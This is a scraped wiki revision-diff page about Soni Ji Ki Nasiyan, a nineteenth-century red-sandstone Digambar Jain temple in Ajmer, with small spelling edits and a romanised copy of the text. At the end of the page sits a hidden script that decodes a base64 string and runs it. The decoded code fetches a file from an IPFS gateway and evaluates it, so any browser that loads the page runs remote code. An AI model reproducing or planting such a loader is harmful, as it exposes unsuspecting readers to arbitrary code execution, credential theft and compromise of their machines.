Difference between revisions of "सोनी जी की नसियाँ अजमेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "बारीक़" to "बारीक")
m (Text replace - "खूबसूरत" to "ख़ूबसूरत")
Line 1: Line 1:
 
*[[राजस्थान]] के शहर [[अजमेर]] में कई [[अजमेर पर्यटन|पर्यटन स्थल]] है जिनमें से ये एक है।
 
*[[राजस्थान]] के शहर [[अजमेर]] में कई [[अजमेर पर्यटन|पर्यटन स्थल]] है जिनमें से ये एक है।
*करोली के [[लाल रंग|लाल]] पत्थरों से बना यह खूबसूरत दिगंबर मंदिर जैन तीर्थंकर आदिनाथ का मंदिर है।  
+
*करोली के [[लाल रंग|लाल]] पत्थरों से बना यह ख़ूबसूरत दिगंबर मंदिर जैन तीर्थंकर आदिनाथ का मंदिर है।  
 
*यह 1864-1865 ईस्वी का बना हुआ हैं।
 
*यह 1864-1865 ईस्वी का बना हुआ हैं।
 
*लाल पत्थरों से बना होने के कारण इसे लाल मंदिर भी कहा जाता है।  
 
*लाल पत्थरों से बना होने के कारण इसे लाल मंदिर भी कहा जाता है।  

Revision as of 11:21, 30 November 2010

  • rajasthan ke shahar ajamer mean kee paryatan sthal hai jinamean se ye ek hai.
  • karoli ke lal pattharoan se bana yah khoobasoorat diganbar mandir jain tirthankar adinath ka mandir hai.
  • yah 1864-1865 eesvi ka bana hua haian.
  • lal pattharoan se bana hone ke karan ise lal mandir bhi kaha jata hai.
  • isamean ek svarn nagari bhi hai jisamean jain dharm se sambandhit pauranik drishy, ayodhya nagari, prayagaraj ke drishy aankit haian.
  • yah svarn nagari apani barik karigiri aur pichchikari ke liye prasiddh hai.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>